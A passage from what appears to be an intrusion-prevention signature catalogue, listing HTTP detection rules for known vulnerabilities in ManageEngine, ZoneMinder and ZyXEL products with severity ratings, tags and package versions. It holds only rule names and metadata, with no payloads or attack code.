Last changed: sgpkg-ips-1603-5242
Vulnerability: Zoho-Manageengine-Adselfservice-Plus-Mobile-App-Authentication-API-DoS
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Adselfservice-Plus-Password-Command-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine ADSelfService Plus detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ADSelfService Plus, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Vulnerability: Zoho-Manageengine-Adselfservice-Plus-Password-Command-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-ApplicationManager-TestCredential.do-Command-Injection

About this situation: An attempt to exploit a vulnerability in ManageEngine Applications Manager
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine Applications Manager, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1070-5242
Last changed: sgpkg-ips-1731-5242
Vulnerability: Zoho-Manageengine-ApplicationManager-TestCredential.do-Command-Injection
Manageengine-Applications-Manager-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Applications-Manager-Alertres_mtrgrp.jsp-Sid-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Application Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Zoho Corporation ManageEngine Applications Manager, Any Operating System, Any Hardware, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1265-5242
Last changed: sgpkg-ips-1265-5242
Vulnerability: Zoho-Manageengine-Applications-Manager-Alertres_mtrgrp.jsp-Sid-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Applications-Manager-Buffer.jsp-Resourceid-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Applications Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Zoho Corporation ManageEngine Applications Manager, Any Operating System, Any Hardware, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1297-5242
Last changed: sgpkg-ips-1297-5242
Vulnerability: Zoho-Manageengine-Applications-Manager-Buffer.jsp-Resourceid-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Applications-Manager-Custom-Monitor-Type-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Application Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine Applications Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Vulnerability: Zoho-Manageengine-Applications-Manager-Custom-Monitor-Type-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Applications-Manager-CVE-2023-28341-Stored-XSS

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Application Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Zoho Corporation ManageEngine Applications Manager, Any Operating System, Any Hardware, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1583-5242
Last changed: sgpkg-ips-1583-5242
Vulnerability: Zoho-Manageengine-Applications-Manager-CVE-2023-28341-Stored-XSS
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Applications-Manager-Displayname-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Application Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Zoho Corporation ManageEngine Applications Manager, Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Vulnerability: Zoho-Manageengine-Applications-Manager-Displayname-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Applications-Manager-Getassociatemonitors-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Applications Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Zoho Corporation ManageEngine Applications Manager, Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1314-5242
Last changed: sgpkg-ips-1314-5242
Vulnerability: Zoho-Manageengine-Applications-Manager-Getassociatemonitors-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Applications-Manager-Mypage.do-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Applications Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine Applications Manager, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1295-5242
Vulnerability: Zoho-Manageengine-Applications-Manager-Mypage.do-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Applications-Manager-Popup_sla.jsp-Sid-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Applications Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Zoho Corporation ManageEngine Applications Manager, Any Operating System, Any Hardware, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1156-5242
Vulnerability: Zoho-Manageengine-Applications-Manager-Popup_sla.jsp-Sid-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Applications-Manager-Program-Action-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Applications Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine Applications Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1336-5242
Last changed: sgpkg-ips-1336-5242
Vulnerability: Zoho-Manageengine-Applications-Manager-Program-Action-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Applications-Manager-Resourceid-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Application Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Zoho Corporation ManageEngine Applications Manager, Any Operating System, Any Hardware, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1163-5242
Vulnerability: Zoho-Manageengine-Applications-Manager-Resourceid-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Applications-Manager-Rulesconstructor.jsp-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Applications Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Zoho Corporation ManageEngine Applications Manager, Any Operating System, Any Hardware, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1311-5242
Last changed: sgpkg-ips-1311-5242
Vulnerability: Zoho-Manageengine-Applications-Manager-Rulesconstructor.jsp-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Applications-Manager-Showmonitorgroupview-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Applications Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Zoho Corporation ManageEngine Applications Manager, Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1311-5242
Last changed: sgpkg-ips-1311-5242
Vulnerability: Zoho-Manageengine-Applications-Manager-Showmonitorgroupview-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Applications-Manager-Uricollector-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Applications Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Zoho Corporation ManageEngine Applications Manager, Any Operating System, Any Hardware, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1323-5242
Vulnerability: Zoho-Manageengine-Applications-Manager-Uricollector-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Applications-Manager-Url-Monitor-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Application Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Zoho Corporation ManageEngine Applications Manager, Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1363-5242
Last changed: sgpkg-ips-1363-5242
Vulnerability: Zoho-Manageengine-Applications-Manager-Url-Monitor-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Desktop-Central-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Desktop Central detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine Desktop Central, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1086-5242
Last changed: sgpkg-ips-1086-5242
Vulnerability: Zoho-Manageengine-Desktop-Central-Arbitrary-File-Deletion
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Multiple-Products-Getdnsresolveoption-Command-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Netflow Analyzer detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine Netflow Analyzer, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1507-5242
Last changed: sgpkg-ips-1513-5242
Vulnerability: Zoho-Manageengine-Multiple-Products-Getdnsresolveoption-Command-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Multiple-Products-Getnmapinitialoption-Command-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Netflow Analyzer detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine Netflow Analyzer, Zoho Corporation ManageEngine OpManager, Zoho Corporation ManageEngine Network Configuration Manager, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1521-5242
Last changed: sgpkg-ips-1521-5242
Vulnerability: Zoho-Manageengine-Multiple-Products-Getnmapinitialoption-Command-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine AssetExplorer, Zoho Corporation ManageEngine SupportCenter, Zoho Corporation ManageEngine ServiceDesk, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1575-5242
Last changed: sgpkg-ips-1575-5242
Vulnerability: Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Multiple-Products-Invokedatauploadtool-Command-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine ServiceDesk Plus detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine SupportCenter, Zoho Corporation ManageEngine ServiceDesk, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1542-5242
Last changed: sgpkg-ips-1542-5242
Vulnerability: Zoho-Manageengine-Multiple-Products-Invokedatauploadtool-Command-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-NetFlow-Analyzer-Reportapihandler-Comparereport-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Netflow Analyzer detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine Netflow Analyzer, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1172-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: Zoho-Manageengine-NetFlow-Analyzer-Reportapihandler-Comparereport-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Opmanager-Alarms-Section-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho ManageEngine OpManager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine OpManager, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: Zoho-Manageengine-Opmanager-Alarms-Section-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Opmanager-Apidbutil-Getdevicesforsearchstring-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine OpManager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine OpManager, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1120-5242
Vulnerability: Zoho-Manageengine-Opmanager-Apidbutil-Getdevicesforsearchstring-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Opmanager-BusinessViewFlashImpl-Xxe

About this situation: An attempt to exploit a vulnerability in Zoho ManageEngine OpManager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine OpManager, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1440-5242
Last changed: sgpkg-ips-1440-5242
Vulnerability: Zoho-Manageengine-Opmanager-BusinessViewFlashImpl-Xxe
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Opmanager-Getreportdata-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine OpManager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine OpManager, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1394-5242
Vulnerability: Zoho-Manageengine-Opmanager-Getreportdata-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Opmanager-Opmanagerfailoverutil-Customername-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine OpManager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine OpManager, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1387-5242
Vulnerability: Zoho-Manageengine-Opmanager-Opmanagerfailoverutil-Customername-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Opmanager-Oputilsservlet-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine OpManager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine OpManager, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1110-5242
Vulnerability: Zoho-Manageengine-Opmanager-Oputilsservlet-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Opmanager-Relationalmailserver-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine OpManager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine OpManager, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1119-5242
Vulnerability: Zoho-Manageengine-Opmanager-Relationalmailserver-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Opmanager-Setmanaged-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine OpManager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine OpManager, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1110-5242
Vulnerability: Zoho-Manageengine-Opmanager-Setmanaged-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Password-Manager-Pro-Dashboardtablecontroller-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Password Manager Pro detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine Access Manager Plus, Zoho Corporation ManageEngine PAM360, Zoho Corporation ManageEngine Password Manager Pro, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1510-5242
Last changed: sgpkg-ips-1510-5242
Vulnerability: Zoho-Manageengine-Password-Manager-Pro-Dashboardtablecontroller-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Password-Manager-Pro-Landingserverfilter-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Access Manager Plus detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine Access Manager Plus, Zoho Corporation ManageEngine PAM360, Zoho Corporation ManageEngine Password Manager Pro, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1542-5242
Last changed: sgpkg-ips-1542-5242
Vulnerability: Zoho-Manageengine-Password-Manager-Pro-Landingserverfilter-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Password-Manager-Pro-Usergrouplisttablecontroller-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Access Manager Plus detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine Access Manager Plus, Zoho Corporation ManageEngine PAM360, Zoho Corporation ManageEngine Password Manager Pro, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1552-5242
Last changed: sgpkg-ips-1552-5242
Vulnerability: Zoho-Manageengine-PWMgrPro-Usergrouplisttablecontroller-SQL-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Recoverymanager-Plus-Updateproxysettings-Command-Injection

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine RecoveryManager Plus detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine RecoveryManager Plus, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1667-5242
Last changed: sgpkg-ips-1667-5242
Vulnerability: Zoho-Manageengine-Recoverymanager-Plus-Updateproxysettings-Command-Injection
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Remote-Code-Execution-CVE-2022-47966

About this situation: An attempt to exploit a vulnerability in Zoho ManageEngine detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ADAudit Plus, Zoho Corporation ManageEngine ADManager Plus, Zoho Corporation ManageEngine Access Manager Plus, CVE2022, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1547-5242
Last changed: sgpkg-ips-1665-5242
Vulnerability: Zoho-Manageengine-Remote-Code-Execution-CVE-2022-47966
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Servicedesk-Plus-CVE-2021-46065-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine ServiceDesk Plus detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ServiceDesk, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1433-5242
Last changed: sgpkg-ips-1433-5242
Vulnerability: Zoho-Manageengine-Servicedesk-Plus-CVE-2021-46065-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Servicedesk-Plus-Embed-Video-Link-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine ServiceDesk Plus detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ServiceDesk, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1583-5242
Last changed: sgpkg-ips-1583-5242
Vulnerability: Zoho-Manageengine-Servicedesk-Plus-Embed-Video-Link-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Servicedesk-Plus-File-Upload-CVE-2019-8394

About this situation: An attempt to exploit a vulnerability in Zoho ManageEngine detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine ServiceDesk Plus, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1308-5242
Last changed: sgpkg-ips-1308-5242
Vulnerability: Zoho-Manageengine-Servicedesk-Plus-File-Upload-CVE-2019-8394
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Servicedesk-Plus-Releases-Status-Comments-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine ServiceDesk Plus detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ServiceDesk, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1578-5242
Vulnerability: Zoho-Manageengine-Servicedesk-Plus-Releases-Status-Comments-XSS
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-Servicedesk-Plus-Remote-Code-Execution-CVE-2021-44077

About this situation: An attempt to exploit a vulnerability in Zoho ManageEngine ServiceDesk Plus detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ServiceDesk, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1411-5242
Vulnerability: Zoho-Manageengine-Servicedesk-Plus-Remote-Code-Execution-CVE-2021-44077
Description:
Back to top

HTTP_CRL-Zoho-Manageengine-SupportCenter-Plus-Custom-Schedules-Executor-Command-Injection

About this situation: An attempt to exploit a vulnerability in Zoho ManageEngine SupportCenter Plus detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine SupportCenter, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1618-5242
Vulnerability: Zoho-Manageengine-SupportCenter-Plus-Custom-Schedules-Executor-Command-Injection
Description:
Back to top

HTTP_CRL-ZoneMinder-Snapshots-Command-Injection

About this situation: An attempt to exploit a vulnerability in ZoneMinder detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, ZoneMinder, CVE2023, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1658-5242
Last changed: sgpkg-ips-1658-5242
Vulnerability: ZoneMinder-Snapshots-Command-Injection
Description:
Back to top

HTTP_CRL-Zusy.24405-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Win32.Trojan.Zusy.24405-Botnet
Description:
Back to top

HTTP_CRL-ZyXEL-NAS-Backdoor-Account-CVE-2024-29972

About this situation: An attempt to exploit a vulnerability in ZyXEL NAS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ZyXEL, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1734-5242
Last changed: sgpkg-ips-1734-5242
Vulnerability: ZyXEL-NAS-Backdoor-Account-CVE-2024-29972
Description:
Back to top

HTTP_CRL-ZyXEL-NAS-Command-Injection-CVE-2023-27992-CVE-2023-4473

About this situation: An attempt to exploit a vulnerability in ZyXEL NAS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ZyXEL, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1734-5242
Last changed: sgpkg-ips-1734-5242
Vulnerability: ZyXEL-NAS-Command-Injection-CVE-2023-27992
Description:
Back to top

HTTP_CRL-ZyXEL-NAS-Command-Injection-CVE-2024-29973

About this situation: An attempt to exploit a vulnerability in ZyXEL NAS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ZyXEL, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1734-5242
Last changed: sgpkg-ips-1734-5242
Vulnerability: ZyXEL-NAS-Command-Injection-CVE-2024-29973
Description:
Back to top

HTTP_CRL-ZyXEL-Parse_config.py-Command-Injection

About this situation: An attempt to exploit a vulnerability in ZyXEL detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, ZyXEL, CVE2023, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1753-5242
Last changed: sgpkg-ips-1753-5242
Vulnerability: ZyXEL-Parse_config.py-Command-Injection
Description:
Back to top

HTTP_CRL-ZyXEL-Privilege-Escalation-And-Information-Disclosure-CVE-2024-29976

About this situation: An attempt to exploit a vulnerability in ZyXEL detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ZyXEL, CVE2024, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
